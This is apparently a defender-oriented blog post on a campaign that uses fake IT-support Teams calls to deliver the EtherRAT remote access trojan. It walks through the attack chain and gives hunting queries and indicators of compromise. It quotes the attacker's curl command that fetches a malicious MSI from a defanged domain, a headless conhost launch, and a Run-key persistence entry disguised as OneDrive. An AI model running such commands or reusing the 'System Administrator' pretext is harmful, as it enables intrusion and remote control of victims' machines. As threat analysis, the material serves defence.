How Fake IT Support Calls Are Delivering EtherRAT
A phishing PDF, a spoofed “System Administrator,” a Teams screen-share, and a blockchain-anchored RAT — this campaign is a masterclass in why identity and endpoint controls have to work together. Here’s the full attack chain, the technical internals, and what your Intune/Entra/Defender stack should be doing about it.
TL;DR
A threat actor tracked by Palo Alto Networks’ Unit 42 is running a multi-stage social engineering campaign that starts with a phishing email (“Employee Survey”), pivots to a live Microsoft Teams voice call from a spoofed external “System Administrator,” and ends with a Node.js-based RAT called EtherRAT that resolves its command-and-control address from an Ethereum smart contract. The attacker abuses Teams’ built-in remote-control feature to drive the victim’s mouse and keyboard directly, walks them through installing legitimate RMM tools (HopToDesk, AnyDesk), then delivers a malicious MSI that stages a real Node.js runtime to run the final payload. Unit 42 found an open directory hosting nine iterations of the installer, meaning this is an actively maintained toolkit, not a one-off.
Why This Matters to EUC and Security Teams
This isn’t a novel exploit. There’s no zero-day here, no privilege escalation bug, no clever bypass of a security boundary. Every single technique in this chain — the phishing email, the Teams call, the screen-share, the RMM install, the MSI execution — works because a human being clicked “Accept” and then “Yes, I trust this.” That makes it squarely an identity and endpoint-management problem, which is exactly the seam between EUC and SecOps that most orgs still haven’t closed.
If you administer Intune, Entra ID, and Conditional Access for a living, this campaign is worth studying closely because the controls that stop it aren’t exotic. They’re the same enrollment restrictions, external-access policies, and endpoint detection rules you already manage — they’re just not always turned on, tuned, or monitored.
The Full Attack Chain
- Phishing email — “Employee Survey results” HTML email lands in the inbox with a PDF attachment: “EE Survey – How to log on.pdf.”
- Teams vishing call — Shortly after the PDF is opened, the victim receives an inbound Teams call from an external account impersonating a “System Administrator,” flagged by Teams as External (unfamiliar).
- Remote control granted — The victim is talked into giving the caller control of their screen via Teams’ native give/request-control feature.
- RMM tools installed — Under remote control, the attacker has the victim download and install HopToDesk and AnyDesk, giving persistent remote access independent of the Teams session.
- Malicious MSI staged — Using a command shell, the attacker pulls
v7.msifrom an attacker-controlled domain and executes it. - Loader unpacks Node.js — The MSI drops a batch script, an obfuscated JS loader, and an encrypted blob, then downloads a legitimate Node.js runtime to execute the payload under a trusted-looking process.
- Multi-stage decryption — A chain of custom ciphers progressively decrypts the loader down to the final payload.
- EtherRAT executes — The final Node.js-based RAT installs registry persistence and resolves its live C2 address from an Ethereum smart contract.
Stage 1 — The Phishing Lure
The campaign starts conventionally: an “Employee Survey results” email carrying a PDF named to look like onboarding instructions. Opening the PDF doesn’t itself trigger a payload — its job is to prime the target for the phone call that follows. This is a pattern worth flagging to your users: a document that references “logging on” or “IT instructions” followed shortly by an unexpected call is the tell, not the document’s content.
Stage 2 — The Teams Vishing Call
The core social engineering move is the voice call itself. The attacker used the account helpdesk@Progressive936.onmicrosoft.com, display name “System Administrator,” calling from a completely separate Microsoft 365 tenant (tenant ID 310e9ead-4f6f-491e-aafe-feb08c8d17a4).
Because the call originates from an external tenant with no established trust relationship, Teams surfaces the session title as “System Administrator (External unfamiliar) | Microsoft Teams” and the participant metadata includes HasForeignTenantUsers: true. This is precisely the signal Microsoft’s newer brand-impersonation warnings are designed to surface more prominently — but a warning only works if the user notices it and knows what it means.
The uncomfortable truth: most end users have never been told that “System Administrator” popping up on a Teams call, from a tenant that isn’t theirs, is a red flag. Awareness training that focuses only on email phishing misses this entirely.
Stage 3 — Remote Control Abuse
Once trust is established, the attacker requests control of the victim’s screen through Teams’ built-in remote-control capability — the same feature used legitimately for troubleshooting and pair-working. Forensically, this leaves behind an artifact named CtrlVirtualCursorWin_..., generated when Teams injects the controller’s mouse movements into the controlled machine via a virtual cursor. Its presence is strong evidence the attacker was actively driving the session rather than merely talking the victim through steps.
While in control, the attacker also pivoted into the organization’s ServiceNow portal and opened a legitimate support ticket requesting application access — a small but telling detail. The actor isn’t just deploying malware; they’re laying groundwork for follow-on social engineering against the real IT team, using a ticket that looks completely normal in the queue.
Stage 4 — Legitimate RMM Tools as Persistence
Rather than relying solely on the Teams session (which the victim could end at any time), the attacker has the victim browse to and install two legitimate remote-access tools — HopToDesk and AnyDesk — while still in control via Teams. This gives the attacker a durable remote-access channel that doesn’t depend on Teams staying connected and that most EDR products won’t flag by default, since both tools are legitimate commercial software with valid signatures.
This “living-off-legitimate-tools” pattern mirrors what Unit 42 and Microsoft have both flagged in related Teams-vishing campaigns this year, including the A0Backdoor and Quick Assist-based intrusions from earlier in 2026.
Stage 5 — The MSI Loader
With RMM access established, the attacker fetches the actual payload:
cmd /c curl -Lo C:\Users\{user}\AppData\Local\Temp\v7.msi hxxps://camorreado[.]click/v7.msi
v7.msi is a Windows Installer package whose custom action is itself JavaScript-driven. On execution it drops three files into the local AppData directory:
| File | Role |
|---|---|
| R2YxSP2m.cmd | Batch script — stages the Node.js runtime and kicks off execution |
| z0SYYdWk9g.dat | Obfuscated JavaScript loader — first decryption stage |
| eXYlcnebRLrWyBc.ini | Encrypted binary blob — contains the final payload |
The install’s CustomAction runs conhost --headless cmd /c "R2YxSP2m.cmd". That batch script downloads a genuine copy of Node.js v18.20.5 directly from nodejs.org, extracts it into a folder renamed 1DIZ0D, and launches node.exe against the JS loader — all under conhost --headless, so nothing visible pops up on screen.
The JavaScript loader decrypts its embedded hex-encoded data using a subtraction cipher keyed with a hardcoded 24-byte value, producing a second-stage loader. That second stage then runs a multi-step cipher chain to decrypt the .ini blob, which unpacks into the final EtherRAT payload.
Why route through a legitimate Node.js download instead of shipping node.exe directly? It sidesteps signature-based detection on a bundled interpreter, blends outbound traffic with a request to nodejs.org that looks completely benign, and gives the attacker a genuine, unmodified runtime to execute in — reducing the malware’s own footprint to a handful of small script and data files.
Stage 6 — EtherRAT and Blockchain-Anchored C2
EtherRAT is a cross-platform, Node.js-based remote access trojan. Once running, it can execute arbitrary commands, manipulate the file system, exfiltrate data, and establishes persistence via the registry Run key, disguised under an entry named OneDriveSetup:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveSetup
Its most distinctive feature is how it finds its command-and-control server. Instead of a single hardcoded domain that defenders can sinkhole or a DGA that can be reverse-engineered, EtherRAT queries an Ethereum smart contract to resolve the current, live C2 address:
Smart contract: 0x6e044e19000487c4a6e6af15b4132a5561b5ee1f
Hosting contract: 0x788a5336c0ef70be87619a3c13a43050c426f7ec
Fallback C2: hxxps://necropatia[.]com
Because the contract lives on a public, decentralized, censorship-resistant blockchain, the attacker can update the C2 address at will simply by pushing a new transaction — no registrar to serve a takedown notice to, no DNS provider to lean on. Unit 42’s investigation surfaced several C2 endpoints resolved this way, all hosted on Azure Cloud App domains (*.cloudapp.azure.com), which further blends the traffic in with legitimate cloud service usage.
EtherRAT isn’t new to Unit 42’s radar — it was previously linked to state-sponsored activity exploiting the React2Shell vulnerability, and has since been picked up by a widening pool of financially motivated actors. This campaign is evidence of that adoption curve continuing.
Actor Infrastructure — Still in Active Development
Unit 42 discovered an open directory on camorreado[.]click hosting installer versions v1 through v9, last updated June 26, 2026 — just two days before the report published. That cadence signals a toolkit under active iteration rather than a single burst campaign, and it’s a strong hint that variant hashes and even distribution domains will keep shifting.
Detection and Defense — What Your Stack Should Actually Be Doing
Entra ID / Teams external access
- Review and tighten External Access and Guest/B2B settings in the Teams admin center — restrict which external domains can initiate chats and calls rather than leaving it open to “everyone.”
- Ensure the brand impersonation / external caller warnings Microsoft rolled out this year are enabled and that end users have actually been shown what they look like.
- Enable the new policy that routes suspected third-party bots and unrecognized external participants into a lobby requiring organizer approval.
Conditional Access
- Use Conditional Access to gate sensitive apps (ServiceNow, HR portals, admin consoles) behind device compliance and MFA, so a compromised endpoint doesn’t automatically mean compromised SaaS access.
- Consider Conditional Access Authentication Context around high-value internal portals to add step-up verification when accessed from a session that just had a remote-control event.
Intune / endpoint controls
- Application control (WDAC/AppLocker via Intune) to restrict execution of unauthorized MSI installers and unsigned/unexpected RMM binaries.
- Attack surface reduction rules in Defender for Endpoint to block Office/PDF-reader child processes from spawning
cmd.exe/powershell.exe, and to flagcurl.exe/conhost --headlesschains launching from user Temp directories. - Maintain an allow-list posture for RMM tools; alert on installation of RMM software that isn’t on your organization’s approved list (HopToDesk in particular is rarely legitimate in most enterprise environments).
User awareness
- Extend phishing training beyond email to explicitly cover Teams vishing: real IT support does not cold-call over Teams from an unfamiliar external tenant and ask to take control of your screen.
- Establish and publicize a real verification channel (a callback number, an internal ticketing flow) so employees have a fast, obvious alternative to just trusting the caller.
Hunting Queries for Microsoft Sentinel / Defender
These are starting points to adapt to your own environment and table schemas — validate field names against your workspace before deploying.
Teams calls from external “unfamiliar” tenants followed by remote control
// Requires Teams/Office 365 audit ingestion into Sentinel
OfficeActivity
| where OfficeWorkload == "MicrosoftTeams"
| where Operation in ("ChatCreated", "MeetingParticipantDetail")
| where ClientIP != ""
| extend ExternalTenant = tostring(parse_json(Parameters)["ForeignTenantId"])
| where isnotempty(ExternalTenant)
| project TimeGenerated, UserId, Operation, ExternalTenant, Parameters
| order by TimeGenerated desc
Suspicious MSI execution followed by Node.js download
DeviceProcessEvents
| where FileName in~ ("msiexec.exe", "conhost.exe")
| where ProcessCommandLine has_any ("--headless", ".msi")
| join kind=inner (
DeviceNetworkEvents
| where RemoteUrl has "nodejs.org"
or RemoteUrl has_any (".click", ".xyz")
) on DeviceId
| project TimeGenerated, DeviceName, ProcessCommandLine, RemoteUrl, InitiatingProcessFileName
curl.exe fetching an MSI from a non-standard domain
DeviceProcessEvents
| where FileName =~ "curl.exe"
| where ProcessCommandLine has ".msi"
| where ProcessCommandLine !has_any ("microsoft.com", "windowsupdate.com")
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
Registry persistence masquerading as OneDrive
DeviceRegistryEvents
| where RegistryKey has @"CurrentVersion\Run"
| where RegistryValueName =~ "OneDriveSetup"
| where RegistryValueData !has "Microsoft OneDrive"
| project TimeGenerated, DeviceName, RegistryValueData
Indicators of Compromise
Attacker infrastructure
| Type | Value |
|---|---|
| Attacker Teams account | helpdesk@Progressive936.onmicrosoft[.]com |
| Attacker tenant ID | 310e9ead-4f6f-491e-aafe-feb08c8d17a4 |
| Distribution domain | camorreado[.]click |
| Fallback C2 domain | necropatia[.]com |
| C2 resolution contract | 0x6e044e19000487c4a6e6af15b4132a5561b5ee1f |
| Hosting contract | 0x788a5336c0ef70be87619a3c13a43050c426f7ec |
Resolved C2 endpoints (Azure-hosted)
| seconds.australiaeast.cloudapp.azure[.]com |
| resurce.swedencentral.cloudapp.azure[.]com |
| cover.wedencentral.cloudapp.azure[.]com |
| dns1.southafricanorth.cloudapp.azure[.]com |
File hashes (SHA-256)
| File | Hash |
|---|---|
| v7.msi | fc2907fa866f86e0821f75060a331ce69ee10ff3aa374587993b17ba5406fa33 |
| stage2_payload1.cmd | c2eeb74892408496f5a307a5b1fdc92d94fd014ab4252868f04046bf84718ab6 |
| stage2_payload2.js | 94cb54d53927e4ba469099760db531be563a84d716df69e864062d90f0f2448d |
| stage2_payload3.dat | 0cb2f7651d50e1ed1a691e82f0297d49444bdded2461e136cffb156d4f234e52 |
| stage3_payload1.js | d46b4e8d188fe1773c44d38d730dcb6287639568240c765d9ad4ad79cd239e82 |
| stage4_payload1.js | c16784e2c7b3e3b798addd718850da18f8eb532ab8f352c769a4470d7124805d |
Key Takeaways
1. This is an identity/EUC problem wearing a malware costume. Every stage before EtherRAT even runs relies on trust decisions a real IT admin controls: who can call your users on Teams, what happens when they ask for screen control, and what’s allowed to install.
2. Blockchain C2 raises the disruption bar. Sinkholing a domain doesn’t kill this malware family — the smart contract can just be updated with a new address. Detection needs to shift toward behavior (process chains, persistence patterns) rather than relying solely on domain reputation.
3. “Living off legitimate software” is the throughline of 2026’s Teams-abuse campaigns. Quick Assist, HopToDesk, AnyDesk, a genuine Node.js runtime — none of this trips traditional malware signatures, because none of it is malware. Your detection strategy has to account for legitimate tools used illegitimately.